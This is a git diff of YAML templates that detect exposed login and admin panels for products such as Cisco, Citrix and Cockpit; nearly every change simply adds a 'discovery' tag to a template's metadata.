a/http/exposed-panels/call-break-cms.yaml b/http/exposed-panels/call-break-cms.yaml index 1fdf2ce8d72..d0b1ed27ff1 100644 --- a/http/exposed-panels/call-break-cms.yaml +++ b/http/exposed-panels/call-break-cms.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel + tags: panel,discovery http: - method: GET diff --git a/http/exposed-panels/camaleon-panel.yaml b/http/exposed-panels/camaleon-panel.yaml index 0cef69ec974..b5daf0124f4 100644 --- a/http/exposed-panels/camaleon-panel.yaml +++ b/http/exposed-panels/camaleon-panel.yaml @@ -10,7 +10,7 @@ info: vendor: tuzitio product: camaleon_cms shodan-query: html:"camaleon_cms" - tags: camaleon,panel,login + tags: camaleon,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/camunda-login-panel.yaml b/http/exposed-panels/camunda-login-panel.yaml index d75d46df021..763b14a4411 100644 --- a/http/exposed-panels/camunda-login-panel.yaml +++ b/http/exposed-panels/camunda-login-panel.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: camunda,panel,login + tags: camunda,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/canon/canon-ir-adv.yaml b/http/exposed-panels/canon/canon-ir-adv.yaml index fbd4f37ef27..399f0d2464e 100644 --- a/http/exposed-panels/canon/canon-ir-adv.yaml +++ b/http/exposed-panels/canon/canon-ir-adv.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 2 shodan-query: title:"Canon iR-ADV" - tags: canon,panel,login,detect + tags: canon,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/cas-login.yaml b/http/exposed-panels/cas-login.yaml index 07c4d64b66a..d00e868a712 100644 --- a/http/exposed-panels/cas-login.yaml +++ b/http/exposed-panels/cas-login.yaml @@ -19,7 +19,7 @@ info: github: https://github.com/apereo/cas fofa-query: title='cas - central authentication service' google-query: intitle:'cas - central authentication service' - tags: apereo,cas,panel,login + tags: apereo,cas,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/casaos-panel.yaml b/http/exposed-panels/casaos-panel.yaml index 628fa7417e0..b3a3163b68e 100644 --- a/http/exposed-panels/casaos-panel.yaml +++ b/http/exposed-panels/casaos-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: html:"CasaOS" product: casaos vendor: icewhale - tags: panel,casaos,login,detect + tags: panel,casaos,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/casdoor-login.yaml b/http/exposed-panels/casdoor-login.yaml index 52c6b54f080..816b438ebae 100644 --- a/http/exposed-panels/casdoor-login.yaml +++ b/http/exposed-panels/casdoor-login.yaml @@ -20,7 +20,7 @@ info: - http.title:"casdoor" fofa-query: title="casdoor" google-query: intitle:"casdoor" - tags: panel,casdoor,casbin + tags: panel,casdoor,casbin,discovery http: - method: GET diff --git a/http/exposed-panels/casemanager-panel.yaml b/http/exposed-panels/casemanager-panel.yaml index c6ce825fee9..7f2912708ef 100644 --- a/http/exposed-panels/casemanager-panel.yaml +++ b/http/exposed-panels/casemanager-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 fofa-query: title="CaseManager" - tags: casemanager,panel + tags: casemanager,panel,discovery http: - method: GET diff --git a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml index 10e1c6368a7..57c6a8ef80d 100644 --- a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml +++ b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Cassia Bluetooth Gateway Management Platform" - tags: cassia,gateway,login,panel + tags: cassia,gateway,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/caton-network-manager-system.yaml b/http/exposed-panels/caton-network-manager-system.yaml index 095a6df2404..3599bdea264 100644 --- a/http/exposed-panels/caton-network-manager-system.yaml +++ b/http/exposed-panels/caton-network-manager-system.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Caton Network Manager System" - tags: caton,manager,login,panel + tags: caton,manager,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/ccm-detect.yaml b/http/exposed-panels/ccm-detect.yaml index 811b093cd28..252cf670847 100644 --- a/http/exposed-panels/ccm-detect.yaml +++ b/http/exposed-panels/ccm-detect.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"CCM - Authentication Failure" - tags: panel,clearcom,ccm + tags: panel,clearcom,ccm,discovery http: - method: GET diff --git a/http/exposed-panels/centreon-panel.yaml b/http/exposed-panels/centreon-panel.yaml index ab44ac8a1be..fb9cbc5b7ff 100644 --- a/http/exposed-panels/centreon-panel.yaml +++ b/http/exposed-panels/centreon-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"centreon" fofa-query: title="centreon" google-query: intitle:"centreon" - tags: panel,centreon,login + tags: panel,centreon,login,discovery http: - method: GET diff --git a/http/exposed-panels/cerebro-panel.yaml b/http/exposed-panels/cerebro-panel.yaml index d74414616fc..31c0b6884b9 100644 --- a/http/exposed-panels/cerebro-panel.yaml +++ b/http/exposed-panels/cerebro-panel.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,cerebro + tags: panel,cerebro,discovery http: - method: GET diff --git a/http/exposed-panels/cgit-panel.yaml b/http/exposed-panels/cgit-panel.yaml index 2a5477b7af1..97f2a9a0b59 100644 --- a/http/exposed-panels/cgit-panel.yaml +++ b/http/exposed-panels/cgit-panel.yaml @@ -21,7 +21,7 @@ info: - http.title:"git repository browser" fofa-query: title="git repository browser" google-query: intitle:"git repository browser" - tags: panel,git,cgit_project + tags: panel,git,cgit_project,discovery http: - method: GET diff --git a/http/exposed-panels/changedetection-panel.yaml b/http/exposed-panels/changedetection-panel.yaml index cb250705d5b..be75ea5f907 100644 --- a/http/exposed-panels/changedetection-panel.yaml +++ b/http/exposed-panels/changedetection-panel.yaml @@ -17,7 +17,7 @@ info: vendor: changedetection product: changedetection shodan-query: title:"Change Detection" - tags: panel,changedetection,detect + tags: panel,changedetection,detect,discovery http: - method: GET diff --git a/http/exposed-panels/checkmk/checkmarx-panel.yaml b/http/exposed-panels/checkmk/checkmarx-panel.yaml index d6641def363..5314c4b1a79 100644 --- a/http/exposed-panels/checkmk/checkmarx-panel.yaml +++ b/http/exposed-panels/checkmk/checkmarx-panel.yaml @@ -15,7 +15,7 @@ info: max-request: 3 verified: true shodan-query: http.html:"CxSASTManagerUri" - tags: panel,checkmarx,detect,login + tags: panel,checkmarx,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/checkmk/checkmk-login.yaml b/http/exposed-panels/checkmk/checkmk-login.yaml index 9215eda51d3..5429204dfda 100644 --- a/http/exposed-panels/checkmk/checkmk-login.yaml +++ b/http/exposed-panels/checkmk/checkmk-login.yaml @@ -17,7 +17,7 @@ info: product: checkmk verified: true shodan-query: http.title:"Check_MK" - tags: panel,checkmk,detect,login + tags: panel,checkmk,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/checkpoint-panel.yaml b/http/exposed-panels/checkpoint-panel.yaml index 7cb192f088d..caa3e63bf62 100644 --- a/http/exposed-panels/checkpoint-panel.yaml +++ b/http/exposed-panels/checkpoint-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: panel,checkpoint + tags: panel,checkpoint,discovery http: - method: GET diff --git a/http/exposed-panels/checkpoint/ssl-network-extender.yaml b/http/exposed-panels/checkpoint/ssl-network-extender.yaml index a5fd647c7d7..c4c6cb29eb2 100644 --- a/http/exposed-panels/checkpoint/ssl-network-extender.yaml +++ b/http/exposed-panels/checkpoint/ssl-network-extender.yaml @@ -27,7 +27,7 @@ info: fofa-query: - title="check point ssl network extender" - title="ssl network extender login" - tags: panel,checkpoint,router + tags: panel,checkpoint,router,discovery http: - method: GET diff --git a/http/exposed-panels/chemotargets-clarityvista-panel.yaml b/http/exposed-panels/chemotargets-clarityvista-panel.yaml index 7865e743e5e..0e78289c0cc 100644 --- a/http/exposed-panels/chemotargets-clarityvista-panel.yaml +++ b/http/exposed-panels/chemotargets-clarityvista-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"ClarityVista" - tags: panel,chemotargets,login,detect + tags: panel,chemotargets,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/chirpstack-login.yaml b/http/exposed-panels/chirpstack-login.yaml index 170aa96d1d8..132621fa1e6 100644 --- a/http/exposed-panels/chirpstack-login.yaml +++ b/http/exposed-panels/chirpstack-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: http.title:"ChirpStack LoRaWAN" fofa-query: title="ChirpStack LoRaWAN" - tags: panel,chirpstack + tags: panel,chirpstack,discovery http: - method: GET diff --git a/http/exposed-panels/chronos-panel.yaml b/http/exposed-panels/chronos-panel.yaml index b887bf0604b..5213ae87e3c 100644 --- a/http/exposed-panels/chronos-panel.yaml +++ b/http/exposed-panels/chronos-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: http.html:"chronoslogin.js" fofa-query: body="chronoslogin.js" - tags: panel,chronos,login,detect + tags: panel,chronos,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/cisco-cm-panel.yaml b/http/exposed-panels/cisco-cm-panel.yaml index b052f8aca48..4e2500e5c8e 100644 --- a/http/exposed-panels/cisco-cm-panel.yaml +++ b/http/exposed-panels/cisco-cm-panel.yaml @@ -1,31 +1,31 @@ -id: cisco-cm-panel - -info: - name: Cisco Unified CM Console - Panel - author: rxerium - severity: info - reference: - - https://www.cisco.com/c/en_uk/products/unified-communications/unified-communications-manager-callmanager/index.html - description: | - Cisco Unified CM Console panel was discovered. - metadata: - max-request: 1 - shodan-query: html:"/ccmadmin/" - tags: cisco,ciscocm,panel,login - -http: - - method: GET - path: - - "{{BaseURL}}/ccmadmin/showHome.do" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<title>Cisco Unified CM Console" - - - type: status - status: +id: cisco-cm-panel + +info: + name: Cisco Unified CM Console - Panel + author: rxerium + severity: info + reference: + - https://www.cisco.com/c/en_uk/products/unified-communications/unified-communications-manager-callmanager/index.html + description: | + Cisco Unified CM Console panel was discovered. + metadata: + max-request: 1 + shodan-query: html:"/ccmadmin/" + tags: cisco,ciscocm,panel,login,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/ccmadmin/showHome.do" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>Cisco Unified CM Console" + + - type: status + status: - 200 # digest: 4a0a0047304502201aeb600697b9c473839b818591d8614f2309d11f59f49ff37594284803280c10022100cf100208da3911cde9051bf89c045ee75c8c35386b318c42f40464f47cf2e0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco-firepower-panel.yaml b/http/exposed-panels/cisco-firepower-panel.yaml index ff2ac49f9b1..81ec601874f 100644 --- a/http/exposed-panels/cisco-firepower-panel.yaml +++ b/http/exposed-panels/cisco-firepower-panel.yaml @@ -22,7 +22,7 @@ info: - body="Cisco Firepower Management Center" - body="Secure Firewall Management Center" - body="UA-110054821-1" - tags: login,cisco,panel,console + tags: login,cisco,panel,console,discovery http: - method: GET diff --git a/http/exposed-panels/cisco-prime-license-manager-panel.yaml b/http/exposed-panels/cisco-prime-license-manager-panel.yaml index 7d6c415e7cb..600cc7292c0 100644 --- a/http/exposed-panels/cisco-prime-license-manager-panel.yaml +++ b/http/exposed-panels/cisco-prime-license-manager-panel.yaml @@ -1,31 +1,31 @@ -id: cisco-prime-license-manager-panel - -info: - name: Cisco Prime License Manager - Detect - author: rxerium - severity: info - reference: - - https://www.cisco.com/c/en/us/support/cloud-systems-management/prime-license-manager/series.html - description: | - Detected exposed Cisco Prime License Manager portals - metadata: - max-request: 1 - shodan-query: http.title:"Cisco Prime License Manager" - tags: cisco,cisco-prime-license-manager,panel - -http: - - method: GET - path: - - "{{BaseURL}}/elm-admin/" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<title>Cisco Prime License Manager" - - - type: status - status: +id: cisco-prime-license-manager-panel + +info: + name: Cisco Prime License Manager - Detect + author: rxerium + severity: info + reference: + - https://www.cisco.com/c/en/us/support/cloud-systems-management/prime-license-manager/series.html + description: | + Detected exposed Cisco Prime License Manager portals + metadata: + max-request: 1 + shodan-query: http.title:"Cisco Prime License Manager" + tags: cisco,cisco-prime-license-manager,panel,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/elm-admin/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>Cisco Prime License Manager" + + - type: status + status: - 200 # digest: 490a0046304402200b34ed54918953a54fa2b0d794ff6d4f6d676644e1edd8337c34699fee1bb56002204227e0f44dfce51f5723ec3e35e13f7ed1b62fa37f8898237909ff9acb6da6e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco-unity-panel.yaml b/http/exposed-panels/cisco-unity-panel.yaml index 56fdd9c5734..0a611da707d 100644 --- a/http/exposed-panels/cisco-unity-panel.yaml +++ b/http/exposed-panels/cisco-unity-panel.yaml @@ -14,7 +14,7 @@ info: vendor: cisco product: unity_connection shodan-query: html:"Cisco Unity Connection" - tags: panel,cisco,unity,login,detect + tags: panel,cisco,unity,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/cisco-webui-login.yaml b/http/exposed-panels/cisco-webui-login.yaml index 2bc08d233fd..c58b0e30737 100644 --- a/http/exposed-panels/cisco-webui-login.yaml +++ b/http/exposed-panels/cisco-webui-login.yaml @@ -11,7 +11,7 @@ info: max-request: 1 shodan-query: html:"webui-centerpanel" fofa-query: body="webui-centerpanel" - tags: webui,cisco,login,panel,detect + tags: webui,cisco,login,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-ace-device-manager.yaml b/http/exposed-panels/cisco/cisco-ace-device-manager.yaml index f817e3e3ac1..f32af024fba 100644 --- a/http/exposed-panels/cisco/cisco-ace-device-manager.yaml +++ b/http/exposed-panels/cisco/cisco-ace-device-manager.yaml @@ -14,7 +14,7 @@ info: shodan-query: html:"ACE 4710 Device Manager" product: ace_4710_application_control_engine vendor: cisco - tags: panel,cisco + tags: panel,cisco,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml index 65c96ac0026..5d3bd553b84 100644 --- a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml +++ b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: cisco product: anyconnect_secure_mobility_client - tags: cisco,panel,vpn + tags: cisco,panel,vpn,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-asa-panel.yaml b/http/exposed-panels/cisco/cisco-asa-panel.yaml index 41fdb19dd59..b4c86167daa 100644 --- a/http/exposed-panels/cisco/cisco-asa-panel.yaml +++ b/http/exposed-panels/cisco/cisco-asa-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: cisco product: adaptive_security_appliance_software - tags: cisco,panel + tags: cisco,panel,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-edge-340.yaml b/http/exposed-panels/cisco/cisco-edge-340.yaml index 4cd00521f08..b5595976924 100644 --- a/http/exposed-panels/cisco/cisco-edge-340.yaml +++ b/http/exposed-panels/cisco/cisco-edge-340.yaml @@ -18,7 +18,7 @@ info: - http.title:"cisco edge 340" fofa-query: title="cisco edge 340" google-query: intitle:"cisco edge 340" - tags: panel,cisco + tags: panel,cisco,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-expressway-panel.yaml b/http/exposed-panels/cisco/cisco-expressway-panel.yaml index d06cbff1561..ce412feec9c 100644 --- a/http/exposed-panels/cisco/cisco-expressway-panel.yaml +++ b/http/exposed-panels/cisco/cisco-expressway-panel.yaml @@ -16,7 +16,7 @@ info: vendor: cisco product: expressway_software shodan-query: html:"Cisco Expressway" - tags: panel,cisco,login,detect + tags: panel,cisco,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-finesse-login.yaml b/http/exposed-panels/cisco/cisco-finesse-login.yaml index 100e94d8469..beaf485286f 100644 --- a/http/exposed-panels/cisco/cisco-finesse-login.yaml +++ b/http/exposed-panels/cisco/cisco-finesse-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: cisco product: finesse - tags: panel,cisco,edb + tags: panel,cisco,edb,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-integrated-login.yaml b/http/exposed-panels/cisco/cisco-integrated-login.yaml index 6c7333ff487..c6ecfdf1bb6 100644 --- a/http/exposed-panels/cisco/cisco-integrated-login.yaml +++ b/http/exposed-panels/cisco/cisco-integrated-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: cisco product: integrated_management_controller - tags: panel,cisco,edb + tags: panel,cisco,edb,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml b/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml index c25715b650c..b2d002ac5a3 100644 --- a/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml +++ b/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml @@ -18,7 +18,7 @@ info: vendor: cisco product: ios_xe shodan-query: http.html_hash:1076109428 - tags: panel,cisco,ssl + tags: panel,cisco,ssl,discovery ssl: - address: "{{Host}}:{{Port}}" diff --git a/http/exposed-panels/cisco/cisco-ise-admin-panel.yaml b/http/exposed-panels/cisco/cisco-ise-admin-panel.yaml index e362bfb0aad..a391844cd27 100644 --- a/http/exposed-panels/cisco/cisco-ise-admin-panel.yaml +++ b/http/exposed-panels/cisco/cisco-ise-admin-panel.yaml @@ -19,7 +19,7 @@ info: - '"Set-Cookie: APPSESSIONID=" && "Path=/admin"' - icon_hash="-945076912" - icon_hash="-12304266" - tags: cisco,ise,admin,login,panel,detect + tags: cisco,ise,admin,login,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-meraki-exposure.yaml b/http/exposed-panels/cisco/cisco-meraki-exposure.yaml index 93d440a66bf..079fa2b8093 100644 --- a/http/exposed-panels/cisco/cisco-meraki-exposure.yaml +++ b/http/exposed-panels/cisco/cisco-meraki-exposure.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,cisco,meraki,disclosure,edb + tags: panel,cisco,meraki,disclosure,edb,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-onprem-panel.yaml b/http/exposed-panels/cisco/cisco-onprem-panel.yaml index 42e5264199c..68785fe2563 100644 --- a/http/exposed-panels/cisco/cisco-onprem-panel.yaml +++ b/http/exposed-panels/cisco/cisco-onprem-panel.yaml @@ -23,7 +23,7 @@ info: - title="On-Prem License Workspace" - title="on-prem license workspace" google-query: intitle:"on-prem license workspace" - tags: cisco,manager,login,panel + tags: cisco,manager,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml index 1703fb56cdd..9b0fa62a5d7 100644 --- a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml +++ b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"prime infrastructure" fofa-query: title="prime infrastructure" google-query: intitle:"prime infrastructure" - tags: panel,cisco + tags: panel,cisco,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-sd-wan.yaml b/http/exposed-panels/cisco/cisco-sd-wan.yaml index 290367626aa..3cda8939d76 100644 --- a/http/exposed-panels/cisco/cisco-sd-wan.yaml +++ b/http/exposed-panels/cisco/cisco-sd-wan.yaml @@ -16,7 +16,7 @@ info: vendor: cisco product: sd-wan shodan-query: cpe:"cpe:2.3:a:cisco:sd-wan" - tags: panel,cisco + tags: panel,cisco,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-secure-cn.yaml b/http/exposed-panels/cisco/cisco-secure-cn.yaml index b88af38e6bb..a61501ecd95 100644 --- a/http/exposed-panels/cisco/cisco-secure-cn.yaml +++ b/http/exposed-panels/cisco/cisco-secure-cn.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Cisco Secure CN" - tags: panel,cisco + tags: panel,cisco,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-secure-desktop.yaml b/http/exposed-panels/cisco/cisco-secure-desktop.yaml index d663962e7c8..8804b28507a 100644 --- a/http/exposed-panels/cisco/cisco-secure-desktop.yaml +++ b/http/exposed-panels/cisco/cisco-secure-desktop.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: cisco product: secure_desktop - tags: cisco,panel + tags: cisco,panel,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-sendgrid.yaml b/http/exposed-panels/cisco/cisco-sendgrid.yaml index 289dad3fca1..6c39c49e257 100644 --- a/http/exposed-panels/cisco/cisco-sendgrid.yaml +++ b/http/exposed-panels/cisco/cisco-sendgrid.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Cisco ServiceGrid" - tags: panel,cisco + tags: panel,cisco,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-systems-login.yaml b/http/exposed-panels/cisco/cisco-systems-login.yaml index 9963fdcf595..9644a1c3ade 100644 --- a/http/exposed-panels/cisco/cisco-systems-login.yaml +++ b/http/exposed-panels/cisco/cisco-systems-login.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: http.title:"Cisco Systems Login" google-query: intitle:"Cisco Systems Login" - tags: panel,cisco + tags: panel,cisco,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-telepresence.yaml b/http/exposed-panels/cisco/cisco-telepresence.yaml index a83b5c495f1..4839efdff9c 100644 --- a/http/exposed-panels/cisco/cisco-telepresence.yaml +++ b/http/exposed-panels/cisco/cisco-telepresence.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"Cisco Telepresence" product: telepresence_tc vendor: cisco - tags: panel,cisco + tags: panel,cisco,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml index c5f1bc8a9a0..a0eaf68e424 100644 --- a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml +++ b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml @@ -20,7 +20,7 @@ info: - http.title:"cisco ucs kvm direct" fofa-query: title="cisco ucs kvm direct" google-query: intitle:"cisco ucs kvm direct" - tags: panel,cisco,ucs,kvm + tags: panel,cisco,ucs,kvm,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-vmanage-login.yaml b/http/exposed-panels/cisco/cisco-vmanage-login.yaml index 4b8ae5ece45..cd53c07a96c 100644 --- a/http/exposed-panels/cisco/cisco-vmanage-login.yaml +++ b/http/exposed-panels/cisco/cisco-vmanage-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Cisco vManage" - tags: panel,cisco + tags: panel,cisco,discovery http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml index cec0ed5193d..53c80eb7990 100644 --- a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml +++ b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -15,7 +15,7 @@ info: max-request: 2 fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg==" google-query: intitle:"SSLVPN Service" - tags: panel,cisco,vpn + tags: panel,cisco,vpn,discovery http: - method: GET diff --git a/http/exposed-panels/citrix-adc-gateway-panel.yaml b/http/exposed-panels/citrix-adc-gateway-panel.yaml index c7f7b4518f6..ea074cb35cf 100644 --- a/http/exposed-panels/citrix-adc-gateway-panel.yaml +++ b/http/exposed-panels/citrix-adc-gateway-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"citrix gateway" fofa-query: title="citrix gateway" google-query: intitle:"citrix gateway" - tags: panel,citrix + tags: panel,citrix,discovery http: - method: GET diff --git a/http/exposed-panels/citrix-vpn-detect.yaml b/http/exposed-panels/citrix-vpn-detect.yaml index f57874ee553..81468eb7193 100644 --- a/http/exposed-panels/citrix-vpn-detect.yaml +++ b/http/exposed-panels/citrix-vpn-detect.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"citrix gateway" fofa-query: title="citrix gateway" google-query: intitle:"citrix gateway" - tags: panel,citrix + tags: panel,citrix,discovery http: - method: GET diff --git a/http/exposed-panels/claris-filemaker-webdirect.yaml b/http/exposed-panels/claris-filemaker-webdirect.yaml index 2cb53390061..0dbfea56910 100644 --- a/http/exposed-panels/claris-filemaker-webdirect.yaml +++ b/http/exposed-panels/claris-filemaker-webdirect.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:"Claris FileMaker WebDirect" - tags: panel,edb + tags: panel,edb,discovery http: - method: GET diff --git a/http/exposed-panels/clave-login-panel.yaml b/http/exposed-panels/clave-login-panel.yaml index 8acb7431667..89df70130f6 100644 --- a/http/exposed-panels/clave-login-panel.yaml +++ b/http/exposed-panels/clave-login-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,clave,login + tags: panel,clave,login,discovery http: - method: GET diff --git a/http/exposed-panels/cleanweb-panel.yaml b/http/exposed-panels/cleanweb-panel.yaml index eaafe3b2d99..0199f343b41 100644 --- a/http/exposed-panels/cleanweb-panel.yaml +++ b/http/exposed-panels/cleanweb-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"CleanWeb" - tags: panel,cleanweb,login,detect + tags: panel,cleanweb,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/clearpass-policy-manager.yaml b/http/exposed-panels/clearpass-policy-manager.yaml index 0310a842d8a..1516d316933 100644 --- a/http/exposed-panels/clearpass-policy-manager.yaml +++ b/http/exposed-panels/clearpass-policy-manager.yaml @@ -18,7 +18,7 @@ info: - http.title:"clearpass policy manager" fofa-query: title="clearpass policy manager" google-query: intitle:"clearpass policy manager" - tags: panel,aruba,arubanetworks + tags: panel,aruba,arubanetworks,discovery http: - method: GET diff --git a/http/exposed-panels/cloudlog-panel.yaml b/http/exposed-panels/cloudlog-panel.yaml index 930104987fd..957aa6ded74 100644 --- a/http/exposed-panels/cloudlog-panel.yaml +++ b/http/exposed-panels/cloudlog-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: title="Login - Cloudlog" - tags: panel,login,cloudlog,detect + tags: panel,login,cloudlog,detect,discovery http: - method: GET diff --git a/http/exposed-panels/cloudpanel-login.yaml b/http/exposed-panels/cloudpanel-login.yaml index dd63dd7a69a..0e9a2087821 100644 --- a/http/exposed-panels/cloudpanel-login.yaml +++ b/http/exposed-panels/cloudpanel-login.yaml @@ -19,7 +19,7 @@ info: - icon_hash="151132309" - title="cloudpanel" google-query: intitle:"cloudpanel" - tags: panel,login,cloudpanel,detect,mgt-commerce + tags: panel,login,cloudpanel,detect,mgt-commerce,discovery http: - method: GET diff --git a/http/exposed-panels/cloudphysician-radar.yaml b/http/exposed-panels/cloudphysician-radar.yaml index bd4b2f9e839..6d52c7202eb 100644 --- a/http/exposed-panels/cloudphysician-radar.yaml +++ b/http/exposed-panels/cloudphysician-radar.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Cloudphysician RADAR" - tags: panel,edb + tags: panel,edb,discovery http: - method: GET diff --git a/http/exposed-panels/cobbler-webgui.yaml b/http/exposed-panels/cobbler-webgui.yaml index c0ce11c793f..6fae985f4f4 100644 --- a/http/exposed-panels/cobbler-webgui.yaml +++ b/http/exposed-panels/cobbler-webgui.yaml @@ -18,7 +18,7 @@ info: - http.title:"cobbler web interface" fofa-query: title="cobbler web interface" google-query: intitle:"cobbler web interface" - tags: cobbler,webserver,panel,cobblerd + tags: cobbler,webserver,panel,cobblerd,discovery http: - method: GET diff --git a/http/exposed-panels/cockpit-project-panel.yaml b/http/exposed-panels/cockpit-project-panel.yaml index 39966e35a2c..35258df4f03 100644 --- a/http/exposed-panels/cockpit-project-panel.yaml +++ b/http/exposed-panels/cockpit-project-panel.yaml @@ -1,50 +1,50 @@ -id: cockpit-project-panel - -info: - name: Cockpit Project Login Panel - Detect - author: righettod - severity: info - description: | - Cockpit Project products was detected. - reference: - - https://github.com/cockpit-project/cockpit - - https://cockpit-project.org/ - metadata: - max-request: 1 - verified: true - shodan-query: http.html:"cockpit/static/login.css" - tags: panel,cockpit,login - -http: - - method: GET - path: - - "{{BaseURL}}/" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_all(to_lower(body), "cockpit/", "is_cockpit_client")' - condition: and - - extractors: - - type: regex - part: body - name: os - group: 1 - regex: - - '(?i)"PRETTY_NAME"\s*:\s*"(.*?)"' - internal: true - - - type: regex - part: body - name: hostname - group: 1 - regex: - - '(?i)"hostname"\s*:\s*"(.*?)"' - internal: true - - - type: dsl - dsl: +id: cockpit-project-panel + +info: + name: Cockpit Project Login Panel - Detect + author: righettod + severity: info + description: | + Cockpit Project products was detected. + reference: + - https://github.com/cockpit-project/cockpit + - https://cockpit-project.org/ + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"cockpit/static/login.css" + tags: panel,cockpit,login,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/" + + matchers: + - type: dsl + dsl: 